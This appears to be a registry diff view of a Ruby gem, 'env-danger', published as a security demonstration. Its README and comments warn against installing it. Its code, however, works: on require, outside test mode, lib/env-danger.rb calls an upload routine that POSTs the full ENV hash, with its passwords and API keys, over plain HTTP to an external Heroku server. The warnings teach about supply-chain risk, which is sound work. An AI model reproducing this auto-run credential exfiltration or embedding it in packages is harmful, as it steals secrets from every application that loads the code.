env-danger 0.1.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- data/.document +5 -0
- data/.rspec +2 -0
- data/Gemfile +21 -0
- data/Gemfile.lock +154 -0
- data/LICENSE.txt +20 -0
- data/README.md +29 -0
- data/Rakefile +53 -0
- data/VERSION +1 -0
- data/env-danger.gemspec +91 -0
- data/lib/env-danger.rb +8 -0
- data/lib/env-danger/danger.rb +23 -0
- data/lib/env-danger/version.rb +4 -0
- data/spec/danger_spec.rb +21 -0
- data/spec/fixtures/env_example.json +0 -0
- data/spec/spec_helper.rb +104 -0
- metadata +244 -0
checksums.yaml
ADDED
@@ -0,0 +1,7 @@
|
|
1
|
+
---
|
2
|
+
SHA1:
|
3
|
+
metadata.gz: f459f79828c0916a13ced463dd0b9f45f5986b52
|
4
|
+
data.tar.gz: 4939a095c90dfe48dca09ed376ef20dcff8e0350
|
5
|
+
SHA512:
|
6
|
+
metadata.gz: e6047eebc78999ceef30fd8a29e5c768268b4ba8731e1eb4fa2fb4e8ca06c2524a1d8cf239cad946408f5d35bc05fda48ccc25669d1f9a44356ec8de96e6b4bf
|
7
|
+
data.tar.gz: bbb1ae0adb36362087f2e9cfd3a08b54bf37764cfb742507d6fa05888cd6590694bf643eecc864a807e8208a3dc2d2e8b9cbf43f2c8fc7f25fc48d8b6079a003
|
data/.document
ADDED
data/.rspec
ADDED
data/Gemfile
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
source 'http://rubygems.org'
|
2
|
+
|
3
|
+
gem 'httparty', github: 'jnunemaker/httparty'
|
4
|
+
|
5
|
+
group :development do
|
6
|
+
gem 'rdoc', '~> 3.12'
|
7
|
+
gem 'bundler', '~> 1.0'
|
8
|
+
gem 'jeweler', '~> 2.0.1'
|
9
|
+
end
|
10
|
+
|
11
|
+
group :development, :test do
|
12
|
+
gem 'rubocop'
|
13
|
+
gem 'rspec-core', '~> 3.2.0.pre', github: 'rspec/rspec-core'
|
14
|
+
gem 'rspec-expectations', '~> 3.2.0.pre', github: 'rspec/rspec-expectations'
|
15
|
+
gem 'rspec-support', '~> 3.2.0.pre', github: 'rspec/rspec-support'
|
16
|
+
gem 'rspec-mocks', '~> 3.2.0.pre', github: 'rspec/rspec-mocks'
|
17
|
+
gem 'rspec', '~> 3.2.0.pre', github: 'rspec/rspec'
|
18
|
+
gem 'simplecov', '>= 0'
|
19
|
+
gem 'coveralls'
|
20
|
+
gem 'webmock'
|
21
|
+
end
|
data/Gemfile.lock
ADDED
@@ -0,0 +1,154 @@
|
|
1
|
+
GIT
|
2
|
+
remote: git://github.com/jnunemaker/httparty.git
|
3
|
+
revision: ed9b00b785c52dbea220b620faa6c8e6fbc29abe
|
4
|
+
specs:
|
5
|
+
httparty (0.13.3)
|
6
|
+
json (~> 1.8)
|
7
|
+
multi_xml (>= 0.5.2)
|
8
|
+
|
9
|
+
GIT
|
10
|
+
remote: git://github.com/rspec/rspec-core.git
|
11
|
+
revision: 037291ea80486790da3916608ef4b101c1f71323
|
12
|
+
specs:
|
13
|
+
rspec-core (3.2.0.pre)
|
14
|
+
rspec-support (= 3.2.0.pre)
|
15
|
+
|
16
|
+
GIT
|
17
|
+
remote: git://github.com/rspec/rspec-expectations.git
|
18
|
+
revision: 76962c4899b0413ce806a79e05a53e4b5d9da2c0
|
19
|
+
specs:
|
20
|
+
rspec-expectations (3.2.0.pre)
|
21
|
+
diff-lcs (>= 1.2.0, < 2.0)
|
22
|
+
rspec-support (= 3.2.0.pre)
|
23
|
+
|
24
|
+
GIT
|
25
|
+
remote: git://github.com/rspec/rspec-mocks.git
|
26
|
+
revision: e9b6bf3532a4d5e01b492a5cad53fe56b751db3e
|
27
|
+
specs:
|
28
|
+
rspec-mocks (3.2.0.pre)
|
29
|
+
diff-lcs (>= 1.2.0, < 2.0)
|
30
|
+
rspec-support (= 3.2.0.pre)
|
31
|
+
|
32
|
+
GIT
|
33
|
+
remote: git://github.com/rspec/rspec-support.git
|
34
|
+
revision: 187845b1d46269b17edcf24a67744f98a8d1e994
|
35
|
+
specs:
|
36
|
+
rspec-support (3.2.0.pre)
|
37
|
+
|
38
|
+
GIT
|
39
|
+
remote: git://github.com/rspec/rspec.git
|
40
|
+
revision: 6af4995482ade2d49ad361ee003dee29f713ab17
|
41
|
+
specs:
|
42
|
+
rspec (3.2.0.pre)
|
43
|
+
rspec-core (= 3.2.0.pre)
|
44
|
+
rspec-expectations (= 3.2.0.pre)
|
45
|
+
rspec-mocks (= 3.2.0.pre)
|
46
|
+
|
47
|
+
GEM
|
48
|
+
remote: http://rubygems.org/
|
49
|
+
specs:
|
50
|
+
addressable (2.3.6)
|
51
|
+
ast (2.0.0)
|
52
|
+
astrolabe (1.3.0)
|
53
|
+
parser (>= 2.2.0.pre.3, < 3.0)
|
54
|
+
builder (3.2.2)
|
55
|
+
coveralls (0.7.2)
|
56
|
+
multi_json (~> 1.3)
|
57
|
+
rest-client (= 1.6.7)
|
58
|
+
simplecov (>= 0.7)
|
59
|
+
term-ansicolor (= 1.2.2)
|
60
|
+
thor (= 0.18.1)
|
61
|
+
crack (0.4.2)
|
62
|
+
safe_yaml (~> 1.0.0)
|
63
|
+
descendants_tracker (0.0.4)
|
64
|
+
thread_safe (~> 0.3, >= 0.3.1)
|
65
|
+
diff-lcs (1.2.5)
|
66
|
+
docile (1.1.5)
|
67
|
+
faraday (0.9.0)
|
68
|
+
multipart-post (>= 1.2, < 3)
|
69
|
+
git (1.2.8)
|
70
|
+
github_api (0.12.2)
|
71
|
+
addressable (~> 2.3)
|
72
|
+
descendants_tracker (~> 0.0.4)
|
73
|
+
faraday (~> 0.8, < 0.10)
|
74
|
+
hashie (>= 3.3)
|
75
|
+
multi_json (>= 1.7.5, < 2.0)
|
76
|
+
nokogiri (~> 1.6.3)
|
77
|
+
oauth2
|
78
|
+
hashie (3.3.2)
|
79
|
+
highline (1.6.21)
|
80
|
+
jeweler (2.0.1)
|
81
|
+
builder
|
82
|
+
bundler (>= 1.0)
|
83
|
+
git (>= 1.2.5)
|
84
|
+
github_api
|
85
|
+
highline (>= 1.6.15)
|
86
|
+
nokogiri (>= 1.5.10)
|
87
|
+
rake
|
88
|
+
rdoc
|
89
|
+
json (1.8.1)
|
90
|
+
jwt (1.2.0)
|
91
|
+
mime-types (2.4.3)
|
92
|
+
mini_portile (0.6.2)
|
93
|
+
multi_json (1.10.1)
|
94
|
+
multi_xml (0.5.5)
|
95
|
+
multipart-post (2.0.0)
|
96
|
+
nokogiri (1.6.5)
|
97
|
+
mini_portile (~> 0.6.0)
|
98
|
+
oauth2 (1.0.0)
|
99
|
+
faraday (>= 0.8, < 0.10)
|
100
|
+
jwt (~> 1.0)
|
101
|
+
multi_json (~> 1.3)
|
102
|
+
multi_xml (~> 0.5)
|
103
|
+
rack (~> 1.2)
|
104
|
+
parser (2.2.0.pre.8)
|
105
|
+
ast (>= 1.1, < 3.0)
|
106
|
+
slop (~> 3.4, >= 3.4.5)
|
107
|
+
powerpack (0.0.9)
|
108
|
+
rack (1.6.0)
|
109
|
+
rainbow (2.0.0)
|
110
|
+
rake (10.4.2)
|
111
|
+
rdoc (3.12.2)
|
112
|
+
json (~> 1.4)
|
113
|
+
rest-client (1.6.7)
|
114
|
+
mime-types (>= 1.16)
|
115
|
+
rubocop (0.27.1)
|
116
|
+
astrolabe (~> 1.3)
|
117
|
+
parser (>= 2.2.0.pre.7, < 3.0)
|
118
|
+
powerpack (~> 0.0.6)
|
119
|
+
rainbow (>= 1.99.1, < 3.0)
|
120
|
+
ruby-progressbar (~> 1.4)
|
121
|
+
ruby-progressbar (1.7.0)
|
122
|
+
safe_yaml (1.0.4)
|
123
|
+
simplecov (0.9.1)
|
124
|
+
docile (~> 1.1.0)
|
125
|
+
multi_json (~> 1.0)
|
126
|
+
simplecov-html (~> 0.8.0)
|
127
|
+
simplecov-html (0.8.0)
|
128
|
+
slop (3.6.0)
|
129
|
+
term-ansicolor (1.2.2)
|
130
|
+
tins (~> 0.8)
|
131
|
+
thor (0.18.1)
|
132
|
+
thread_safe (0.3.4)
|
133
|
+
tins (0.13.2)
|
134
|
+
webmock (1.20.4)
|
135
|
+
addressable (>= 2.3.6)
|
136
|
+
crack (>= 0.3.2)
|
137
|
+
|
138
|
+
PLATFORMS
|
139
|
+
ruby
|
140
|
+
|
141
|
+
DEPENDENCIES
|
142
|
+
bundler (~> 1.0)
|
143
|
+
coveralls
|
144
|
+
httparty!
|
145
|
+
jeweler (~> 2.0.1)
|
146
|
+
rdoc (~> 3.12)
|
147
|
+
rspec (~> 3.2.0.pre)!
|
148
|
+
rspec-core (~> 3.2.0.pre)!
|
149
|
+
rspec-expectations (~> 3.2.0.pre)!
|
150
|
+
rspec-mocks (~> 3.2.0.pre)!
|
151
|
+
rspec-support (~> 3.2.0.pre)!
|
152
|
+
rubocop
|
153
|
+
simplecov
|
154
|
+
webmock
|
data/LICENSE.txt
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
Copyright (c) 2015 David Fisher
|
2
|
+
|
3
|
+
Permission is hereby granted, free of charge, to any person obtaining
|
4
|
+
a copy of this software and associated documentation files (the
|
5
|
+
"Software"), to deal in the Software without restriction, including
|
6
|
+
without limitation the rights to use, copy, modify, merge, publish,
|
7
|
+
distribute, sublicense, and/or sell copies of the Software, and to
|
8
|
+
permit persons to whom the Software is furnished to do so, subject to
|
9
|
+
the following conditions:
|
10
|
+
|
11
|
+
The above copyright notice and this permission notice shall be
|
12
|
+
included in all copies or substantial portions of the Software.
|
13
|
+
|
14
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
15
|
+
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
16
|
+
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
|
17
|
+
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
|
18
|
+
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
|
19
|
+
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
|
20
|
+
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
data/README.md
ADDED
@@ -0,0 +1,29 @@
|
|
1
|
+
# ENV Danger
|
2
|
+
|
3
|
+
As per this [blog post](http://movingfast.io/articles/environment-variables-considered-harmful/), and [discussion on Hacker News](https://news.ycombinator.com/item?id=8826024), keeping secret keys in your environment variables *may* be a poor idea. [The Twelve Factor App](http://12factor.net/) however specifically [recommends doing this](http://12factor.net/config).
|
4
|
+
|
5
|
+
## What's this doing?
|
6
|
+
|
7
|
+
This will take all your enviromental variables (passwords, secret keys, etc) and post them (insecurely over HTTP) to my server on Heroku.
|
8
|
+
|
9
|
+
Server code can be found at: [https://github.com/tibbon/env_danger_server](https://github.com/tibbon/env_danger_server)
|
10
|
+
|
11
|
+
## Usage
|
12
|
+
|
13
|
+
**Do not install this gem and use it in production, or really... even in testing**
|
14
|
+
|
15
|
+
But if you choose to ignore me:
|
16
|
+
|
17
|
+
In your Gemfile
|
18
|
+
```ruby
|
19
|
+
gem 'env-danger'
|
20
|
+
```
|
21
|
+
|
22
|
+
Or via Bundle: `bundle install env-danger`
|
23
|
+
|
24
|
+
You can run tests via `RAILS_ENV=test bundle exec rspec spec`. Yes, this is a little weird, but intentionally so.
|
25
|
+
|
26
|
+
**Including this in your app will post your ENV variables to my (likely not very secure) server on Heroku. This is a terrible idea**
|
27
|
+
|
28
|
+
|
29
|
+
|
data/Rakefile
ADDED
@@ -0,0 +1,53 @@
|
|
1
|
+
# encoding: utf-8
|
2
|
+
|
3
|
+
require 'rubygems'
|
4
|
+
require 'bundler'
|
5
|
+
begin
|
6
|
+
Bundler.setup(:default, :development)
|
7
|
+
rescue Bundler::BundlerError => e
|
8
|
+
$stderr.puts e.message
|
9
|
+
$stderr.puts 'Run `bundle install` to install missing gems'
|
10
|
+
exit e.status_code
|
11
|
+
end
|
12
|
+
require 'rake'
|
13
|
+
|
14
|
+
require 'jeweler'
|
15
|
+
Jeweler::Tasks.new do |gem|
|
16
|
+
# gem is a Gem::Specification...
|
17
|
+
# see http://guides.rubygems.org/specification-reference/ for more options
|
18
|
+
gem.name = 'env-danger'
|
19
|
+
gem.homepage = 'http://github.com/tibbon/env-danger'
|
20
|
+
gem.license = 'MIT'
|
21
|
+
gem.summary = %(Do not install, a security-hole demo only)
|
22
|
+
gem.description = %(Demonstrates the dangers of using
|
23
|
+
ENV to store credentials)
|
24
|
+
gem.email = 'tibbon@gmail.com'
|
25
|
+
gem.authors = ['David Fisher']
|
26
|
+
# dependencies defined in Gemfile
|
27
|
+
end
|
28
|
+
Jeweler::RubygemsDotOrgTasks.new
|
29
|
+
|
30
|
+
require 'rake/testtask'
|
31
|
+
Rake::TestTask.new(:test) do |test|
|
32
|
+
test.libs << 'lib' << 'test'
|
33
|
+
test.pattern = 'test/**/test_*.rb'
|
34
|
+
test.verbose = true
|
35
|
+
end
|
36
|
+
|
37
|
+
desc 'Code coverage detail'
|
38
|
+
task :simplecov do
|
39
|
+
ENV['COVERAGE'] = 'true'
|
40
|
+
Rake::Task['test'].execute
|
41
|
+
end
|
42
|
+
|
43
|
+
task default: :test
|
44
|
+
|
45
|
+
require 'rdoc/task'
|
46
|
+
Rake::RDocTask.new do |rdoc|
|
47
|
+
version = File.exist?('VERSION') ? File.read('VERSION') : ''
|
48
|
+
|
49
|
+
rdoc.rdoc_dir = 'rdoc'
|
50
|
+
rdoc.title = "env-danger #{version}"
|
51
|
+
rdoc.rdoc_files.include('README*')
|
52
|
+
rdoc.rdoc_files.include('lib/**/*.rb')
|
53
|
+
end
|
data/VERSION
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
0.1.0
|
data/env-danger.gemspec
ADDED
@@ -0,0 +1,91 @@
|
|
1
|
+
# Generated by jeweler
|
2
|
+
# DO NOT EDIT THIS FILE DIRECTLY
|
3
|
+
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
|
4
|
+
# -*- encoding: utf-8 -*-
|
5
|
+
# stub: env-danger 0.1.0 ruby lib
|
6
|
+
|
7
|
+
Gem::Specification.new do |s|
|
8
|
+
s.name = "env-danger"
|
9
|
+
s.version = "0.1.0"
|
10
|
+
|
11
|
+
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
|
12
|
+
s.require_paths = ["lib"]
|
13
|
+
s.authors = ["David Fisher"]
|
14
|
+
s.date = "2015-01-02"
|
15
|
+
s.description = "Demonstrates the dangers of using\n ENV to store credentials"
|
16
|
+
s.email = "tibbon@gmail.com"
|
17
|
+
s.extra_rdoc_files = [
|
18
|
+
"LICENSE.txt",
|
19
|
+
"README.md"
|
20
|
+
]
|
21
|
+
s.files = [
|
22
|
+
".document",
|
23
|
+
".rspec",
|
24
|
+
"Gemfile",
|
25
|
+
"Gemfile.lock",
|
26
|
+
"LICENSE.txt",
|
27
|
+
"README.md",
|
28
|
+
"Rakefile",
|
29
|
+
"VERSION",
|
30
|
+
"env-danger.gemspec",
|
31
|
+
"lib/env-danger.rb",
|
32
|
+
"lib/env-danger/danger.rb",
|
33
|
+
"lib/env-danger/version.rb",
|
34
|
+
"spec/danger_spec.rb",
|
35
|
+
"spec/fixtures/env_example.json",
|
36
|
+
"spec/spec_helper.rb"
|
37
|
+
]
|
38
|
+
s.homepage = "http://github.com/tibbon/env-danger"
|
39
|
+
s.licenses = ["MIT"]
|
40
|
+
s.rubygems_version = "2.2.2"
|
41
|
+
s.summary = "Do not install, a security-hole demo only"
|
42
|
+
|
43
|
+
if s.respond_to? :specification_version then
|
44
|
+
s.specification_version = 4
|
45
|
+
|
46
|
+
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
|
47
|
+
s.add_runtime_dependency(%q<httparty>, [">= 0"])
|
48
|
+
s.add_development_dependency(%q<rdoc>, ["~> 3.12"])
|
49
|
+
s.add_development_dependency(%q<bundler>, ["~> 1.0"])
|
50
|
+
s.add_development_dependency(%q<jeweler>, ["~> 2.0.1"])
|
51
|
+
s.add_development_dependency(%q<rubocop>, [">= 0"])
|
52
|
+
s.add_development_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
|
53
|
+
s.add_development_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
|
54
|
+
s.add_development_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
|
55
|
+
s.add_development_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
|
56
|
+
s.add_development_dependency(%q<rspec>, ["~> 3.2.0.pre"])
|
57
|
+
s.add_development_dependency(%q<simplecov>, [">= 0"])
|
58
|
+
s.add_development_dependency(%q<coveralls>, [">= 0"])
|
59
|
+
s.add_development_dependency(%q<webmock>, [">= 0"])
|
60
|
+
else
|
61
|
+
s.add_dependency(%q<httparty>, [">= 0"])
|
62
|
+
s.add_dependency(%q<rdoc>, ["~> 3.12"])
|
63
|
+
s.add_dependency(%q<bundler>, ["~> 1.0"])
|
64
|
+
s.add_dependency(%q<jeweler>, ["~> 2.0.1"])
|
65
|
+
s.add_dependency(%q<rubocop>, [">= 0"])
|
66
|
+
s.add_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
|
67
|
+
s.add_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
|
68
|
+
s.add_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
|
69
|
+
s.add_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
|
70
|
+
s.add_dependency(%q<rspec>, ["~> 3.2.0.pre"])
|
71
|
+
s.add_dependency(%q<simplecov>, [">= 0"])
|
72
|
+
s.add_dependency(%q<coveralls>, [">= 0"])
|
73
|
+
s.add_dependency(%q<webmock>, [">= 0"])
|
74
|
+
end
|
75
|
+
else
|
76
|
+
s.add_dependency(%q<httparty>, [">= 0"])
|
77
|
+
s.add_dependency(%q<rdoc>, ["~> 3.12"])
|
78
|
+
s.add_dependency(%q<bundler>, ["~> 1.0"])
|
79
|
+
s.add_dependency(%q<jeweler>, ["~> 2.0.1"])
|
80
|
+
s.add_dependency(%q<rubocop>, [">= 0"])
|
81
|
+
s.add_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
|
82
|
+
s.add_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
|
83
|
+
s.add_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
|
84
|
+
s.add_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
|
85
|
+
s.add_dependency(%q<rspec>, ["~> 3.2.0.pre"])
|
86
|
+
s.add_dependency(%q<simplecov>, [">= 0"])
|
87
|
+
s.add_dependency(%q<coveralls>, [">= 0"])
|
88
|
+
s.add_dependency(%q<webmock>, [">= 0"])
|
89
|
+
end
|
90
|
+
end
|
91
|
+
|
data/lib/env-danger.rb
ADDED
@@ -0,0 +1,8 @@
|
|
1
|
+
require 'httparty'
|
2
|
+
require_relative './env-danger/version'
|
3
|
+
require_relative './env-danger/danger'
|
4
|
+
|
5
|
+
# Doesn't run in this line in test environment
|
6
|
+
# stops test from picking it up and triggering it
|
7
|
+
# Also makes my testing easier, so the real request isn't made
|
8
|
+
EnvDanger.upload unless ENV['RAILS_ENV'] == 'test'
|
@@ -0,0 +1,23 @@
|
|
1
|
+
# EnvDanger
|
2
|
+
# This module takes your system's ENV variables and posts them to my server
|
3
|
+
# Do NOT use in production
|
4
|
+
# This is an example of what could happen if you allow untrusted code
|
5
|
+
# to execute on your system.
|
6
|
+
# Surely, no reasonable individual would allow such,
|
7
|
+
# but how often do you audit your gems?
|
8
|
+
module EnvDanger
|
9
|
+
include HTTParty
|
10
|
+
POST_ADDRESS = 'http://env-danger.herokuapp.com/envs'
|
11
|
+
class << self
|
12
|
+
def upload
|
13
|
+
post(
|
14
|
+
POST_ADDRESS,
|
15
|
+
body: {
|
16
|
+
all_envs: {
|
17
|
+
variables: ENV
|
18
|
+
}
|
19
|
+
}
|
20
|
+
)
|
21
|
+
end
|
22
|
+
end
|
23
|
+
end
|
data/spec/danger_spec.rb
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
require 'spec_helper'
|
2
|
+
require 'env-danger'
|
3
|
+
|
4
|
+
RSpec.describe EnvDanger do
|
5
|
+
describe '.upload' do
|
6
|
+
before :each do
|
7
|
+
# Temporarily clear ENV hash,
|
8
|
+
# so that not much is posting to the server
|
9
|
+
ENV.clear
|
10
|
+
ENV.update({'foo' => 'bar'})
|
11
|
+
|
12
|
+
stub_request(:post, EnvDanger::POST_ADDRESS).
|
13
|
+
to_return(body: fixture('env_example.json'))
|
14
|
+
end
|
15
|
+
it 'posts ENV data via HTTParty' do
|
16
|
+
env_result = EnvDanger.upload
|
17
|
+
expect(a_request(:post, EnvDanger::POST_ADDRESS)).to have_been_made
|
18
|
+
expect(env_result.code).to eq 200
|
19
|
+
end
|
20
|
+
end
|
21
|
+
end
|
File without changes
|
data/spec/spec_helper.rb
ADDED
@@ -0,0 +1,104 @@
|
|
1
|
+
require 'simplecov'
|
2
|
+
require 'coveralls'
|
3
|
+
require 'webmock/rspec'
|
4
|
+
|
5
|
+
# This file was generated by the `rspec --init` command. Conventionally, all
|
6
|
+
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
|
7
|
+
# The generated `.rspec` file contains `--require spec_helper` which will cause
|
8
|
+
# this file to always be loaded, without a need to explicitly require it in any
|
9
|
+
# files.
|
10
|
+
#
|
11
|
+
# Given that it is always loaded, you are encouraged to keep this file as
|
12
|
+
# light-weight as possible. Requiring heavyweight dependencies from this file
|
13
|
+
# will add to the boot time of your test suite on EVERY test run, even for an
|
14
|
+
# individual file that may not need all of that loaded. Instead, consider making
|
15
|
+
# a separate helper file that requires the additional dependencies and performs
|
16
|
+
# the additional setup, and require it from the spec files that actually need
|
17
|
+
# it.
|
18
|
+
#
|
19
|
+
# The `.rspec` file also contains a few flags that are not defaults but that
|
20
|
+
# users commonly want.
|
21
|
+
#
|
22
|
+
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
|
23
|
+
RSpec.configure do |config|
|
24
|
+
# rspec-expectations config goes here. You can use an alternate
|
25
|
+
# assertion/expectation library such as wrong or the stdlib/minitest
|
26
|
+
# assertions if you prefer.
|
27
|
+
config.expect_with :rspec do |expectations|
|
28
|
+
# This option will default to `true` in RSpec 4. It makes the `description`
|
29
|
+
# and `failure_message` of custom matchers include text for helper methods
|
30
|
+
# defined using `chain`, e.g.:
|
31
|
+
# be_bigger_than(2).and_smaller_than(4).description
|
32
|
+
# # => "be bigger than 2 and smaller than 4"
|
33
|
+
# ...rather than:
|
34
|
+
# # => "be bigger than 2"
|
35
|
+
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
|
36
|
+
end
|
37
|
+
|
38
|
+
# rspec-mocks config goes here. You can use an alternate test double
|
39
|
+
# library (such as bogus or mocha) by changing the `mock_with` option here.
|
40
|
+
config.mock_with :rspec do |mocks|
|
41
|
+
# Prevents you from mocking or stubbing a method that does not exist on
|
42
|
+
# a real object. This is generally recommended, and will default to
|
43
|
+
# `true` in RSpec 4.
|
44
|
+
mocks.verify_partial_doubles = true
|
45
|
+
end
|
46
|
+
|
47
|
+
# The settings below are suggested to provide a good initial experience
|
48
|
+
# with RSpec, but feel free to customize to your heart's content.
|
49
|
+
|
50
|
+
# These two settings work together to allow you to limit a spec run
|
51
|
+
# to individual examples or groups you care about by tagging them with
|
52
|
+
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
|
53
|
+
# get run.
|
54
|
+
config.filter_run :focus
|
55
|
+
config.run_all_when_everything_filtered = true
|
56
|
+
|
57
|
+
# Limits the available syntax to the non-monkey patched syntax that is
|
58
|
+
# recommended. For more details, see:
|
59
|
+
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
|
60
|
+
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
|
61
|
+
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
|
62
|
+
config.disable_monkey_patching!
|
63
|
+
|
64
|
+
# This setting enables warnings. It's recommended, but in some cases may
|
65
|
+
# be too noisy due to issues in dependencies.
|
66
|
+
config.warnings = true
|
67
|
+
|
68
|
+
# Many RSpec users commonly either run the entire suite or an individual
|
69
|
+
# file, and it's useful to allow more verbose output when running an
|
70
|
+
# individual spec file.
|
71
|
+
if config.files_to_run.one?
|
72
|
+
# Use the documentation formatter for detailed output,
|
73
|
+
# unless a formatter has already been configured
|
74
|
+
# (e.g. via a command-line flag).
|
75
|
+
config.default_formatter = 'doc'
|
76
|
+
end
|
77
|
+
|
78
|
+
# Print the 10 slowest examples and example groups at the
|
79
|
+
# end of the spec run, to help surface which specs are running
|
80
|
+
# particularly slow.
|
81
|
+
config.profile_examples = 10
|
82
|
+
|
83
|
+
# Run specs in random order to surface order dependencies. If you find an
|
84
|
+
# order dependency and want to debug it, you can fix the order by providing
|
85
|
+
# the seed, which is printed after each run.
|
86
|
+
# --seed 1234
|
87
|
+
config.order = :random
|
88
|
+
|
89
|
+
# Seed global randomization in this process using the `--seed` CLI option.
|
90
|
+
# Setting this allows you to use `--seed` to deterministically reproduce
|
91
|
+
# test failures related to randomization by passing the same `--seed` value
|
92
|
+
# as the one that triggered the failure.
|
93
|
+
Kernel.srand config.seed
|
94
|
+
end
|
95
|
+
|
96
|
+
# Helper methods for accessing fixture path
|
97
|
+
def fixture_path
|
98
|
+
File.expand_path('../fixtures', __FILE__)
|
99
|
+
end
|
100
|
+
|
101
|
+
# Helper method for accessing a real file in the fixture path
|
102
|
+
def fixture(file)
|
103
|
+
File.new(fixture_path + '/' + file)
|
104
|
+
end
|
metadata
ADDED
@@ -0,0 +1,244 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: env-danger
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 0.1.0
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- David Fisher
|
8
|
+
autorequire:
|
9
|
+
bindir: bin
|
10
|
+
cert_chain: []
|
11
|
+
date: 2015-01-02 00:00:00.000000000 Z
|
12
|
+
dependencies:
|
13
|
+
- !ruby/object:Gem::Dependency
|
14
|
+
name: httparty
|
15
|
+
requirement: !ruby/object:Gem::Requirement
|
16
|
+
requirements:
|
17
|
+
- - ">="
|
18
|
+
- !ruby/object:Gem::Version
|
19
|
+
version: '0'
|
20
|
+
type: :runtime
|
21
|
+
prerelease: false
|
22
|
+
version_requirements: !ruby/object:Gem::Requirement
|
23
|
+
requirements:
|
24
|
+
- - ">="
|
25
|
+
- !ruby/object:Gem::Version
|
26
|
+
version: '0'
|
27
|
+
- !ruby/object:Gem::Dependency
|
28
|
+
name: rdoc
|
29
|
+
requirement: !ruby/object:Gem::Requirement
|
30
|
+
requirements:
|
31
|
+
- - "~>"
|
32
|
+
- !ruby/object:Gem::Version
|
33
|
+
version: '3.12'
|
34
|
+
type: :development
|
35
|
+
prerelease: false
|
36
|
+
version_requirements: !ruby/object:Gem::Requirement
|
37
|
+
requirements:
|
38
|
+
- - "~>"
|
39
|
+
- !ruby/object:Gem::Version
|
40
|
+
version: '3.12'
|
41
|
+
- !ruby/object:Gem::Dependency
|
42
|
+
name: bundler
|
43
|
+
requirement: !ruby/object:Gem::Requirement
|
44
|
+
requirements:
|
45
|
+
- - "~>"
|
46
|
+
- !ruby/object:Gem::Version
|
47
|
+
version: '1.0'
|
48
|
+
type: :development
|
49
|
+
prerelease: false
|
50
|
+
version_requirements: !ruby/object:Gem::Requirement
|
51
|
+
requirements:
|
52
|
+
- - "~>"
|
53
|
+
- !ruby/object:Gem::Version
|
54
|
+
version: '1.0'
|
55
|
+
- !ruby/object:Gem::Dependency
|
56
|
+
name: jeweler
|
57
|
+
requirement: !ruby/object:Gem::Requirement
|
58
|
+
requirements:
|
59
|
+
- - "~>"
|
60
|
+
- !ruby/object:Gem::Version
|
61
|
+
version: 2.0.1
|
62
|
+
type: :development
|
63
|
+
prerelease: false
|
64
|
+
version_requirements: !ruby/object:Gem::Requirement
|
65
|
+
requirements:
|
66
|
+
- - "~>"
|
67
|
+
- !ruby/object:Gem::Version
|
68
|
+
version: 2.0.1
|
69
|
+
- !ruby/object:Gem::Dependency
|
70
|
+
name: rubocop
|
71
|
+
requirement: !ruby/object:Gem::Requirement
|
72
|
+
requirements:
|
73
|
+
- - ">="
|
74
|
+
- !ruby/object:Gem::Version
|
75
|
+
version: '0'
|
76
|
+
type: :development
|
77
|
+
prerelease: false
|
78
|
+
version_requirements: !ruby/object:Gem::Requirement
|
79
|
+
requirements:
|
80
|
+
- - ">="
|
81
|
+
- !ruby/object:Gem::Version
|
82
|
+
version: '0'
|
83
|
+
- !ruby/object:Gem::Dependency
|
84
|
+
name: rspec-core
|
85
|
+
requirement: !ruby/object:Gem::Requirement
|
86
|
+
requirements:
|
87
|
+
- - "~>"
|
88
|
+
- !ruby/object:Gem::Version
|
89
|
+
version: 3.2.0.pre
|
90
|
+
type: :development
|
91
|
+
prerelease: false
|
92
|
+
version_requirements: !ruby/object:Gem::Requirement
|
93
|
+
requirements:
|
94
|
+
- - "~>"
|
95
|
+
- !ruby/object:Gem::Version
|
96
|
+
version: 3.2.0.pre
|
97
|
+
- !ruby/object:Gem::Dependency
|
98
|
+
name: rspec-expectations
|
99
|
+
requirement: !ruby/object:Gem::Requirement
|
100
|
+
requirements:
|
101
|
+
- - "~>"
|
102
|
+
- !ruby/object:Gem::Version
|
103
